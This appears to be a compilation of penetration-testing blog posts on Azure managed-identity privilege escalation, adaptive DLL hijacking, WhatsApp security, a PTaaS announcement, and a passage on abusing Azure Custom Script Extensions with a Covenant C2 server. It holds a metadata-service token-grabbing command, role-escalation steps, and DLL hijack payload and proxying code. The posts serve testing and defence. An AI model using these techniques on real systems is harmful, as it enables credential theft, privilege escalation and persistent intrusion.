Back

Azure Privilege Escalation Using Managed Identities

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it’s not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR – Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.

Vmtophat

Important note: Anyone with command execution rights on a Virtual Machine (VM), that has a Managed Identity, can execute commands as that managed identity from the VM.

Here are some potential scenarios that could result in command execution rights on an Azure VM:

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an “Identity” tab that will show the status of that VM’s managed identity.

Id

Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).

Iam

From the AZ CLI – AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here’s the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn’t the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.

Mi List

From the AZ CLI – On the VM

Let’s assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the “az login –identity” command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list -–assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don’t have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it’s not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here’s a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication – Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on another VMs via Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk:

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription “Owner” GUID
  4. Add a specific user (see below) to the subscription “Owners” IAM role

The provided code sample can be modified (See: “CHANGE-ME-TO-AN-ID”) to add a specific ID to the subscription Owners group.

While this is a little difficult to demo, we can see in the screen shot below that a new principal ID (starting with 64) was added to the owners group as part of the script execution.

Poc

2/25/20 – Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here – get-MIStorageKeys.ps1

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.

Back

Adaptive DLL Hijacking

DLL hijacking has been a centerpiece of our operations for many years. During that time we’ve explored the deep caveats which make this technique difficult to actually use in the real world. Our implementations have expanded to include export table cloning, dynamic IAT patching, stack walking, and run time table reconstruction. We explore the details of these techniques extensively in our Dark Side Ops courses and we’d like to share some of that knowledge here.

If you’ve ever “understood” DLL hijacking, only to return to your lab and fail to get it working properly, this post is for you.

TLDR? Check out Koppeling. You really should read it though 

Refresher

This post won’t cover the basics of DLL hijacking. We expect you are familiar with module search order, KnownDLLs, “safe search”, etc. If you need a refresher, here are some links:

In addition, some tooling designed to discover/exploit hijacks:

When you first learned about DLL hijacking, you were likely shown a fairly primitive example which is trivial to exploit. Something like this:

void BeUnsafe() {
	HMODULE module = LoadLibrary("functions.dll");
	// ...
}

Here, we simply need to get some evil code into the correct location as “functions.dll”. LoadLibrary will ultimately trigger the execution of our DllMain function, where we might write something like this:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	// Do evil stuff
	system ("start calc.exe");

	return TRUE;
}

There are a few critical reasons exploitation is so trivial here. We’ll go through them here and then look at each one in more detail throughout the post.

  1. We don’t maintain the stability of the source process. In most instances, it will exit, crash, or otherwise misbehave as a result of our hijack. After all, it’s likely loading this DLL for a reason.
  2. We don’t maintain code execution in the source process. As an extension of 1, we are simply executing calc externally. We don’t care if the process stays up, or even what happens after we “pop our shell”.
  3. We don’t care about loader lock. Because our entry point is so simple, we don’t have to worry about executing complex code inside DllMain while the loader lock is held (which can be dangerous).
  4. We don’t have to worry about export names. Because this hijack occurs as a result of LoadLibrary, our malicious DLL doesn’t need to include any specific export names or ordinals.

If you’ve ever attempted to hijack in the real world, and something broke/failed, it was likely because of one (or many) of the 4 points above. Our time spent hijacking has yielded many tools and snippets which we’ll share throughout the post, so let’s get smarter.

Execution Sinks

There are two primary “sinks” from which DLL execution can originate. The names aren’t important, but we need consistent terminology to stay on the same page. Both of these sinks are provided by the module loader (LDR) within ntdll.dll. If an actor is interested in gaining execution as part of a DLL load, they require a call to ntdll!LdrpCallInitRoutine, triggering execution of evil!DllMain.

Static Sink (IAT)

The most obvious cause for DLL initialization is the result of its inclusion in a dependency graph. Specifically, it’s membership of a required module’s import address table (IAT). This will most likely occur during process initialization (ntdll!LdrpInitializeProcess), but can also occur as a result of dynamic loading.

Here, the subsystem is simply calculating all required dependencies for a particular load event, and sequentially initializing them. However, before passing execution to the new module, it’s export table will be examined to ensure it provides the expected functionality. This is done by comparing the EAT of the child module and patching those addresses into the IAT of the parent module. A typical call stack looks something like this:

ntdll!LdrInitializeThunk <- New process starts
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code

Dynamic Sink (LoadLibrary)

In a similar, but distinctly different process, active code is requesting a new module be initialized without specifying required functions. As a result, ntdll!LdrLoadDll will happily ignore the export table of the target module. This will likely be followed by GetProcAddress in an attempt to identify a particular function for run time use, but not always.

The dependency graph will be calculated with the requested module at its root and load events will occur as described above. This call stack looks something like this:

KernelBase!LoadLibraryExW <- Dynamic module load is requested
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code
Takeaway

Hijacks are more complicated to implement when part of a static sink. We need to ensure our export table supplies the required import names of our parent module before we have control over execution. In addition, by the time we have control of execution the addresses in our EAT will have already been patched into the parent module. This complicates any solution which would just rebuild the export table at run time.

Function Proxying

Maintaining stability in our source process demands that we proxy functionality to the real DLL (if there is one). This essentially means, through one means or another, linking our export table to the export table of the real DLL. Game hackers have been using this for a long time, but like hikers and hunters, the knowledge was slow to propagate to network security spheres. Here are some references links that tackle proxying through different methods:

And here are some projects that implement these methods:

These techniques all accomplish the same outcome through slightly different means. Let’s take a quick look at some strategies for better understanding.

Export Forwarding

PE files provide a simple mechanism for redirecting exports to another module. We can take advantage of this and simply point our names at the same export from the real DLL. You can either rename the real file or just use the full path. Most do this using linker directives like so:

#pragma comment(linker,"/export:ReadThing=real.ReadThing")
#pragma comment(linker,"/export:WriteThing=real.WriteThing")
#pragma comment(linker,"/export:DeleteThing=real.#3")
#pragma comment(linker,"/export:DoThing=C:\\Windows\\real.DoThing")
// ...

Very easy, and we offload the work to the loader subsystem. It might look a bit obvious that we are attempting a hijack (e.g. every export is forwarded), but the advantage lies in its simplicity. One downside is the requirement to modify source code and/or build processes to prepare a DLL for hijacking, we’ll solve this later.

The traditional format for the module name was *without* the “.dll” extension when defining a forward. Nowadays this doesn’t matter as the LDR subsystem has learned to ignore it. However, older systems like Windows 7 / Server 2008 will still fail if an extension is included. They also might crash when error reporting is attempted due to LdrUnloadDll being called too early.

Stack Patching

An equally elegant, but more dynamic approach is to walk the stack backward from DllMain and replace the return value for the LoadLibrary call above us with a different module handle. As a result, any future calls to lookup functions will simply bypass us completely. It should be no surprise to the reader at this point, but this technique will only work for dynamic sinks. With static sinks, the LDR subsystem has already validated our export table and patched IATs with its values, nor does it care what we have to say about module handles.

Preempt mentions this in a post about Vault 7 techniques, but they don’t go into much detail. Luckily we’re crazy enough to try this stuff, so we’ve written a small PoC which should demo the trick nicely for anyone who wants to run with it.

https://gist.github.com/monoxgas/b8a87bec4c4b51d8ac671c7ff245c812

Run Time Linking

Here we create a hollow list of function pointers, and compile our export table to reference them. The names will be there, but the functions themselves won’t go anywhere useful. When we gain control in DllMain, we load the real DLL dynamically and remap all of the function pointers at run time. This is essentially re-implementing export forwarding…. but with more code. We still have the same disadvantage of modifying source and/or build processes.

EXPORTS

ReadThing=ReadThing_wrapper @1
WriteThing=WriteThing_wrapper @2
DeleteThing=DeleteThing_wrapper @3
.code
extern ProcList:QWORD
ReadThing_wrapper proc
	jmp ProcList[0*8]
ReadThing_wrapper endp
WriteThing_wrapper proc
	jmp ProcList[1*8]
WriteThing_wrapper endp
DeleteThing_wrapper proc
	jmp ProcList[2*8]
DeleteThing_wrapper endp
extern "C" UINT_PTR ProcList[3] = {0};

extern "C" void ReadThing_wrapper();
extern "C" void WriteThing_wrapper();
extern "C" void DeleteThing_wrapper();

LPCSTR ImportNames[] = {
   "ReadThing",
   "WriteThing",
   "DeleteThing"
}

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	HANDLE real_dll = LoadLibrary( "real.dll" );
	for ( int i = 0; i < 3; i++ ) {
		ProcList[i] = GetProcAddress(real_dll , ImportNames[i]);
	}

	return TRUE;
}

Run-Time Generation

We could also go crazy and just re-build the entire export address table at run time. Here we need not know what DLL we are going to hijack when we write our code, which is nice. We can also add a basic function which re-implements the Windows search order to try and locate the real DLL dynamically. It could also perform basic alterations like .old and .bak within the current directory just in case.

HMODULE FindModule(HMODULE our_dll)
{
	WCHAR our_name[MAX_PATH];
	GetModuleFileName(our_dll, our_name, MAX_PATH);

	// Locate real DLL using our_name

	if (our_dll != module){
		return module;
	}
}

void ProxyExports(HMODULE module) 
{
	HMODULE real_dll = FindModule(module);

	// Rebuild our export table with real_dll

	return;
}

BOOL WINAPI DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	ProxyExports(module);

	return TRUE;
}

This strategy, while elegant, suffers from being so dynamic. We no longer include the export names in our static table unless we explicitly add them (re: static sinks). In addition, we receive execution after the import tables (IATs) of other modules might already contain references to our old export table (static sinks again). There is no easy fix for the former that keeps us dynamic unless we simply add every export name we might expect to need across all DLLs. To fix the latter, we need to iterate loaded modules and patch in addresses to the real DLL. Nothing some code can’t solve, but a convoluted solution to some eyes. The bulk of this strategy can be found in the Koppeling project below.

Another caveat is that references to, and within, the export table are relative virtual addresses (RVAs). Because of their size (DWORD), we are limited to placing our new export table somewhere within 4GB of the PE base unless it can fit inside the old one. Not an issue on x86, but certainly on x64.

Takeaway

Export forwarding is the easiest solution when it comes to proxying functionality. It’s preparatory (we need to create the DLL with a specific hijack in mind), but the loader subsystem does the heavy lifting. We can make some nice improvements to the preparation process itself which we’ll look at later. We like the flexibility of run-time generation, but it has weaknesses regarding static-sinks and their requirement for export names to be included in the file on disk. When it comes down to it, we might as well automate export forwarding.

Loader Lock

The LDR subsystem holds a single list of loaded modules for the process. To solve any thread sharing issues, a “loader lock” is implemented to ensure only one thread is ever modifying a module list at one time. This is relevant for hijacking as we typically gain code execution inside DllMain, which occurs while the LDR subsystem is still working on the module list. In other words, ntdll has to pass execution to us while the loader lock is still being held (not ideal). As a consequence, Microsoft provides a big list of things you certainly SHOULD NOT DO while inside DllMain.

  • Call LoadLibrary or LoadLibraryEx (either directly or indirectly). This can cause a deadlock or a crash.
  • Call GetStringTypeA, GetStringTypeEx, or GetStringTypeW (either directly or indirectly). This can cause a deadlock or a crash.
  • Synchronize with other threads. This can cause a deadlock.
  • Acquire a synchronization object that is owned by code that is waiting to acquire the loader lock. This can cause a deadlock.
  • Initialize COM threads by using CoInitializeEx. Under certain conditions, this function can call LoadLibraryEx.
  • Call the registry functions. These functions are implemented in Advapi32.dll. If Advapi32.dll is not initialized before your DLL, the DLL can access uninitialized memory and cause the process to crash.
  • Call CreateProcess. Creating a process can load another DLL.
  • Call ExitThread. Exiting a thread during DLL detach can cause the loader lock to be acquired again, causing a deadlock or a crash.
  • Call CreateThread. Creating a thread can work if you do not synchronize with other threads, but it is risky.
  • Use the memory management function from the dynamic C Run-Time (CRT). If the CRT DLL is not initialized, calls to these functions can cause the process to crash.
  • Call functions in User32.dll or Gdi32.dll. Some functions load another DLL, which may not be initialized.
  • Use managed code.

Scary list, right?

In our experience, however, this list is not as bad as it might appear. For example, LoadLibrary is typically safe to call within DllMain. In fact during static sinks, the loader lock is not re-acquired as long as the same thread is still in initialization. The call to LdrLoadDll will simply re-trigger dependency graph calculation and initialization. Does this mean that Microsoft is wrong to publish the list above? Absolutely not. They are just trying to prevent issues wherever possible.

The real answer to “Can I do <questionable thing> inside DllMain?” is typically “it depends, but avoid trying it”. Let’s check out one example where LDR synchronization can cause a deadlock:

DWORD ThreadFunc(PVOID param) {
	printf("[+] New thread started.");
	return 1;
}

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	DWORD dwThread;
	HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

	// Deadlock starts here
	WaitForSingleObject(hThread, INFINITE);

	return TRUE;
}

Regardless of the sink we use, our DllMain will get stuck waiting for the new thread to finish, but the new thread will be waiting for us to finish. You can see this in the two call stacks for the threads:

...
ntdll!LdrpCallInitRoutine
Theif!DllMain
KernelBase!WaitForSingleObjectEx
ntdll!NtWaitForSingleObject <- Waiting for the thread
ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!NtWaitForSingleObject <- Waiting for LdrpInitCompleteEvent
         (can also be NtDelayExecution/LdrpProcessInitialized != 1)

Inside a dynamic sink, you’ll probably see the deadlock occur in LdrpDrainWorkQueue (as the process has already been initialized by then).

ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeThread
ntdll!LdrpDrainWorkQueue
ntdll!NtDelayExecution <- Waiting for LdrpWorkCompleteEvent

This outcome is frustrating, because starting a new thread is the easiest way to avoid LDR conflicts. We can collect execution in DllMain, kick off a new thread, and let our malicious code run there once the process has finished initializing. To avoid the deadlock, we could remove the WaitForSingleObject call like so:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
    if (reason != DLL_PROCESS_ATTACH)
        return TRUE;

    DWORD dwThread;
    HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

    // WaitForSingleObject(hThread, INFINITE);

    return TRUE;
}

This works if the process stays up long enough for our code to execute, but this is a rare occurrence. Most likely, we will return execution to the primary module and it will exit quickly or throw an error if we haven’t done proxying properly. Our thread will never get a chance to do anything useful.

Hooking for Stability

Lucky for us, we do hold execution long enough to implement a hook, so we can try to take over primary execution once LDR is done. Where exactly we place this hook is going to depend on where in the execution chain we sit.

  • Pre-Load: The process is still being initialized and execution has not been handed over to the primary module. In this case, we’d likely want to hook the entry point of the primary module.
  • Post-Load: The process has already started core execution, and we might be loaded as a consequence of a LoadLibrary call. The most optimal is to just hook the last function in the call stack which is part of the primary module. Whatever issues/errors bubble up can be ignored then.

To differentiate between these two scenarios was can just keep walking backward in the stack. If we find a return address for the primary module, we are probably post-load. Otherwise, the process likely hasn’t kicked off yet and the entry point is our best bet. Naturally, we’ve built a proof of concept already so you don’t have to pull your hair out:

https://gist.github.com/monoxgas/5027de10caad036c864efb32533202ec

Takeaway

Loader lock represents some challenges, but nothing too difficult as long as we respect it. Starting a separate thread for any significant code is the best option. In situations where we need to keep the process alive so the thread can continue run, we can use function hooking.

Koppeling

We started this post by introducing various complexities of hijacking. Let’s review and pair them up with relevant solutions:

  1. Stability of the source process: Use function proxying, avoid loader lock.
  2. Maintaining code execution inter-process: Use proxying and/or function hooking.
  3. Complexities of loader lock: Use new threads and/or function hooking.
  4. Static export names: Use post-build cloning, static definitions, linker comments, etc.

If there is one thing to communicate however, the solution space is quite large and everyone will have preferences. Our current “best” implementation combines the simplicity of export forwarding with post-build patching for flexibility. The process goes like this:

  1. We compile/collect our “evil” DLL for hijacking. It doesn’t need to be aware of any hijacking duty (unless you need to add hooking).
  2. We clone the exports of a reference DLL into the “evil” DLL. The “real” DLL is parsed and the export table is duplicated into a new PE section. Export forwarding is used to correctly proxy functionality.
  3. We use the freshly cloned DLL in any hijack. Stability is guaranteed and we can maintain execution inter-process.

We’re releasing a project to demonstrate this, and some other, advanced hijacking techniques called Koppeling. Much like our sRDI project, it allows you to prepare any arbitrary DLL for hijacking provided you know the final path of the reference DLL. We hope you find use for it and contribute if you love hijacking as much as we do.

https://github.com/monoxgas/Koppeling

Wrap Up

Our team is very passionate about not only how to weaponize a technique, but how to do it with stability and poise. We want to avoid impact to customer environments at all costs. This kind of care demands hours of research, testing, and development. Our Slingshot toolkit maintains seamless integration with the techniques we’ve detailed here to ensure our team and others can take full advantage of hijacking. As mentioned earlier, we also dive deeper into these topics in our Dark Side Ops course series if you’re hungry for more.

We hope this post has provided a deeper understanding of this often misrepresented technique. Till next time.

– Nick (@monoxgas)

Back

Why Do People Confuse “End-to-End Encryption” with “Security”?

It is very common to hear people make blanket statements like “WhatsApp is secure,” but they rarely truly understand the actual security controls that WhatsApp is providing. In fact, this notion of being “secure” is one of the main reasons why WhatsApp gained so much popularity and built such a big user base.

In today’s world where everything is on the Internet, people tend to crave some privacy, especially when they are communicating with other people and sharing personal conversations, and the fact that WhatsApp offers a secure communication channel where the messages between users are fully encrypted to the point where the company/app that is providing the service cannot see the messages between their users makes people feel a false sense of security when using WhatsApp.

What “Security” is WhatsApp Really Providing?

Let’s first make sure we understand what security control WhatsApp is claiming it provides. WhatsApp uses the Signal protocol. The encryption scheme is simply asymmetric encryption of messages between the users, and the transmission of the encrypted messages are facilitated by a server provided by WhatsApp.

So, the way the message is protected while in transit from the sender to the intended recipient is secure.

What Other Aspects of Security Do People Need to be Mindful Of?

When it comes to security, there’s a lot more involved than just securing the data while it’s in transit. If securing applications were as simple as securing the communication channel, then websites wouldn’t have any vulnerabilities in them once they had implemented SSL, but we know that is not the case. So why would it be any different for WhatsApp, or any other mobile app for that matter?

Just because the communication channel is secure, doesn’t mean that the rest of the application is secure too. What people tend to forget is that the content of the messages that they’re receiving may still be malicious and have a security impact based on the user’s behavior.

Phishing Attacks

Let’s say a user is sent a phishing link, and the user clicks on it to see where it takes them – they will fall victim to the attack just like they would have if they had received the same link via email or any other method. Just like people are told never to click on a link from an email – especially if it’s from someone they don’t know or trust – the same rule applies here.

Malware

Malware is everywhere on the internet, and being able to identify and avoid opening infected files is a common challenge. Just like malware can be downloaded from web-browsing or from opening email attachments, similarly, opening files that may be infected that were received by a messaging app has the same consequences. There are many stories on the news today about how people are affected because they opened a video clip, audio file, etc. and were infected with malware.

The App Itself

The app that you are using, may itself be vulnerable too and allow attackers to remotely execute code on a user’s device. WhatsApp had a buffer overflow vulnerability that allowed attackers to easily execute code on WhatsApp users’ devices. Details of the vulnerability itself can be found on the CVE-2019-11931 page. Almost all users of WhatsApp on Android, iOS, and Windows were affected. This wasn’t the only vulnerability found on WhatsApp, but attackers were able to inject spyware on to phones by exploiting a zero-day vulnerability. The most damaging part of this attack was that it did not require any action to be taken by the user that was being infected. Read more in this article by the Financial Times.

Other than WhatsApp, there are also cases where the app itself was created for secure communications but was designed incorrectly and ended up all over the news. The most recent example that comes to mind is when the French government launched a new message app for their state employees only, but the account sign-up process was flawed, and allowed anyone to sign up and message using the system. Details of the issue can be found here.

Why Should You Care?

People need to understand the consequences of using apps for communication purposes, especially when they may be using these apps for business. Organizations will typically have contracts with service providers like Slack, Microsoft Teams, etc. to have official channels of communication. This allows the organization to securely manage their employee’s communications, and ensure that sensitive information stays secured correctly, both in transit and at rest. In addition, in the event of lost devices, these services allow organizations to remotely delete any sensitive data that may have been stored on the devices themselves.

An example of where there’s serious concern around public officials using WhatsApp for official communications was raised when it was discovered that Jared Kushner may have been using WhatsApp for his official communications. Read more about the concerns here.

Using proper communication channels is very critical when conducting business, given the sensitive nature of almost all communication and data that enables running a successful business.

Back

NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™

PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing.

Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge in traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program level security testing comprised of an expert manual pentesting team enhanced by automation.

“During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.”

According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”*

NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges, by enabling:

  • Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
  • Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
  • Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
  • More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and PTaaS powered by the Resolve™ platform’s continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.

Learn more about NetSPI PTaaS powered by Resolve™ at here or set up a 1:1 meeting at RSAC on February 24-28 online here.

*Gartner “Market Guide for Vulnerability Assessment,” Craig Lawson, et al, 20 November 2019

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100

Back

Attacking Azure with Custom Script Extensions

PowerShell and Bash scripts are excellent tools for automating simple or repetitive tasks. Azure values this and provides several mechanisms for remotely running scripts and commands in virtual machines (VMs). While there are many practical, safe uses of these Azure features, they can also be used maliciously. In this post we’ll explore how the Custom Script Extension and Run Command functionality could be leveraged by an attacker to establish a foothold in an environment, which could be used to persist access and escalate privileges.

Background

Before we dive into how an attacker would make use of the Custom Script Extension and Run Command features, let’s first understand what they are and their intended uses.

Custom Script Extension

Azure provides a large selection of virtual machine (VM) extensions which perform post-deployment automation tasks on Azure VMs. Typical tasks performed by VM extensions include anti-virus deployment, VM configuration, and application deployment/monitoring. The Custom Script Extension is particularly interesting as it downloads a script from a user-specified location (e.g. URL, blob storage, etc.) and then executes the script on a running Azure Windows or Linux VM. The typical usage of Custom Script Extensions is for one-time setup tasks, like installing an IIS Server, but since it runs an arbitrary script, it could perform just about anything.

Run Command

The Run Command feature connects to the Virtual Machine Agent to run commands and scripts. The scripts can be provided through the Azure Portal, REST API, Azure CLI, or PowerShell. An advantage of the Run Command feature is that commands can be executed even when the VM is otherwise unreachable (e.g. if the RDP or SSH ports are closed). This makes the Run Command feature particularly useful for diagnosing VM and network issues.

Key Similarities

While there are differences between the two features, there are some key similarities that make them particularly useful to attackers and penetration testers:

  1. Both features are available to a user with the Virtual Machine Contributor role.
  2. Both features run user-supplied commands in any VM that the user can access.
  3. Both features run the commands as the LocalSystem account on the VM.

Scenario:

Now that we understand some of the features available to us, the let’s explore how an attacker could utilize these features for their own purposes. We’ll play the role of a penetration tester who has compromised (or been provided with) an account which has the VM Contributor role in Azure. This role would allow us to “manage virtual machines, but not access to them, and not the virtual network or storage account they’re connected to” (link). Our goal is to maintain access to the environment and escalate our privileges.

Attack Overview

At a high-level, here are the steps our proof-of-concept attack will take:

  1. We’ll set up a Covenant command and control (C2) server outside of the target Azure environment. This server will host a PowerShell script (the “Launcher“) which when executed in a VM will run the Covenant implant (the “Grunt”).
  2. Through the Azure Portal, we’ll identify our target virtual machine(s) and add a Custom Script Extension. This Custom Script Extension will download our Powershell Launcher and start the Grunt. This will connect back to the C2 server, and allow us to run commands as LocalSystem on the VM.
  3. Once we’ve established access, we’ll exit out and cover our tracks by removing the extension.
  4. For demonstration purposes, we’ll also repeat this process using the Run Command feature by sending a PowerShell command which will execute our Launch and run another Grunt.

While this proof-of-concept attack will be focused on Windows VMs and tooling, but the same concepts and features are equally applicable to Azure Linux VMs.

1: Covenant Command and Control Server Setup

Let’s start by setting up Covenant. Covenant is an advanced .NET command and control framework. We’ll be installing Covenant on a server we control, outside of the Azure environment that we’re attacking. In this proof of concept, we’ll be using c2.netspi.invalid as our C2 server. This is not a real DNS name, but it illustrates the concept.

I’ll skip past installation and startup because solid guides are available on the Covenant Wiki. Once Covenant is installed and running, the UI is available on port 7443 by default. We’ll navigate to the webpage, register an initial admin user and login.

